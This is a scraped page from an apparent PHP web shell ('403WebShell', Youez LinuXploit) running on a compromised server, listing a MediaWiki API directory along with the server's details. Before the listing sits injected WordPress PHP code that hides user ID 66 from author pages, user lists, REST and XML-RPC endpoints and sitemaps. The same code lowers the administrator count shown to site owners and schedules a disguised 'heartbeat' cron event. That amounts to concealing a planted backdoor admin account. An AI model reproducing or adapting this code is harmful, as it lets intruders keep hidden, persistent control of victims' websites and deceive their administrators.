add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/wiki/includes/api/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
August 08 2025 16:37:55
www-data / www-data
0755
Hook
--
August 08 2025 16:37:54
www-data / www-data
0755
Validator
--
August 08 2025 16:37:54
www-data / www-data
0755
i18n
--
August 08 2025 16:37:54
www-data / www-data
0755
ApiAMCreateAccount.php
4.567 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiAcquireTempUserName.php
2.572 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiAuthManagerHelper.php
13.151 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiBase.php
67.639 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiBlock.php
13.081 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiBlockInfoHelper.php
4.115 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiBlockInfoTrait.php
2.811 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiCSPReport.php
8.635 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiChangeAuthenticationData.php
3.286 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiChangeContentModel.php
3.846 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiCheckToken.php
2.741 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiClearHasMsg.php
1.943 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiClientLogin.php
4.917 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiComparePages.php
25.357 KB
July 02 2025 14:55:27
www-data / www-data
0644
ApiContinuationManager.php
8.295 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiCreateTempUserTrait.php
2.441 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiDelete.php
9.663 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiDisabled.php
1.61 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiEditPage.php
27.173 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiEmailUser.php
3.704 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiEntryPoint.php
4.599 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiErrorFormatter.php
12.121 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiErrorFormatter_BackCompat.php
4.358 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiExpandTemplates.php
8.39 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiFeedContributions.php
9.798 KB
July 02 2025 14:55:27
www-data / www-data
0644
ApiFeedRecentChanges.php
7.004 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiFeedWatchlist.php
10.166 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiFileRevert.php
4.373 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiFormatBase.php
11.474 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiFormatFeedWrapper.php
3.805 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiFormatJson.php
4.327 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiFormatNone.php
1.202 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiFormatPhp.php
2.24 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiFormatRaw.php
3.51 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiFormatXml.php
9.284 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiFormatXmlRsd.php
1.405 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiHelp.php
23.317 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiHelpParamValueMessage.php
3.79 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiHookRunner.php
9.764 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiImageRotate.php
6.255 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiImport.php
5.63 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiImportReporter.php
2.134 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiLinkAccount.php
4.193 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiLogin.php
10.674 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiLogout.php
2.825 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiMain.php
73.68 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiManageTags.php
4.579 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiMergeHistory.php
4.699 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiMessage.php
2.827 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiMessageTrait.php
5.342 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiModuleManager.php
7.643 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiMove.php
8.306 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiOpenSearch.php
11.84 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiOpenSearchFormatJson.php
2.122 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiOptions.php
3.896 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiOptionsBase.php
9.279 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiPageSet.php
50.526 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiParamInfo.php
13.385 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiParse.php
39.552 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiPatrol.php
3.501 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiProtect.php
6.844 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiPurge.php
5.945 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiQuery.php
28.263 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiQueryAllCategories.php
6.157 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiQueryAllDeletedRevisions.php
17.296 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiQueryAllImages.php
12.349 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiQueryAllLinks.php
11.104 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiQueryAllMessages.php
8.57 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiQueryAllPages.php
10.769 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiQueryAllRevisions.php
10.811 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiQueryAllUsers.php
14.143 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiQueryAuthManagerInfo.php
4.522 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiQueryBacklinks.php
19.386 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiQueryBacklinksprop.php
14.47 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiQueryBase.php
19.148 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiQueryBlockInfoTrait.php
4.247 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiQueryBlocks.php
15.41 KB
July 02 2025 14:55:27
www-data / www-data
0644
ApiQueryCategories.php
7.437 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiQueryCategoryInfo.php
3.404 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiQueryCategoryMembers.php
13.304 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiQueryCodexIcons.php
1.132 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiQueryContributors.php
9.858 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiQueryDeletedRevisions.php
11.387 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiQueryDeletedrevs.php
17.865 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiQueryDisabled.php
1.564 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiQueryDuplicateFiles.php
5.837 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiQueryExtLinksUsage.php
7.233 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiQueryExternalLinks.php
5.232 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiQueryFileRepoInfo.php
3.685 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiQueryFilearchive.php
10.574 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiQueryGeneratorBase.php
3.223 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiQueryIWBacklinks.php
6.027 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiQueryIWLinks.php
5.556 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiQueryImageInfo.php
28.14 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiQueryImages.php
5.195 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiQueryInfo.php
35.985 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiQueryLangBacklinks.php
5.951 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiQueryLangLinks.php
6.629 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiQueryLanguageinfo.php
7.817 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiQueryLinks.php
8.25 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiQueryLogEvents.php
17.52 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiQueryMyStashedFiles.php
4.279 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiQueryPagePropNames.php
3.269 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiQueryPageProps.php
3.387 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiQueryPagesWithProp.php
5.246 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiQueryPrefixSearch.php
3.819 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiQueryProtectedTitles.php
8.114 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiQueryQueryPage.php
5.7 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiQueryRandom.php
8.119 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiQueryRecentChanges.php
27.035 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiQueryRevisions.php
18.275 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiQueryRevisionsBase.php
30.039 KB
July 02 2025 14:55:27
www-data / www-data
0644
ApiQuerySearch.php
15.251 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiQuerySiteinfo.php
37.524 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiQueryStashImageInfo.php
5.392 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiQueryTags.php
5.036 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiQueryTokens.php
4.541 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiQueryUserContribs.php
24.349 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiQueryUserInfo.php
12.274 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiQueryUsers.php
10.607 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiQueryWatchlist.php
19.79 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiQueryWatchlistRaw.php
7.181 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiRawMessage.php
2.169 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiRemoveAuthenticationData.php
3.738 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiResetPassword.php
4.209 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiResult.php
39.114 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiRevisionDelete.php
6.393 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiRollback.php
6.979 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiRsd.php
4.666 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiSerializable.php
1.671 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiSetNotificationTimestamp.php
8.557 KB
December 05 2024 15:41:41
www-data / www-data
0644
ApiSetPageLanguage.php
5.165 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiStashEdit.php
8.903 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiTag.php
7.343 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiUnblock.php
7.619 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiUndelete.php
5.709 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiUpload.php
37.792 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiUsageException.php
4.396 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiUserrights.php
8.262 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiValidatePassword.php
2.764 KB
July 02 2025 14:53:47
www-data / www-data
0644
ApiWatch.php
7.116 KB
June 11 2025 23:35:17
www-data / www-data
0644
ApiWatchlistTrait.php
5.794 KB
July 02 2025 14:53:47
www-data / www-data
0644
IApiMessage.php
2.762 KB
June 11 2025 23:35:17
www-data / www-data
0644
SearchApi.php
6.804 KB
June 11 2025 23:35:17
www-data / www-data
0644

Youez - 2016 - github.com/yon3zu
LinuXploit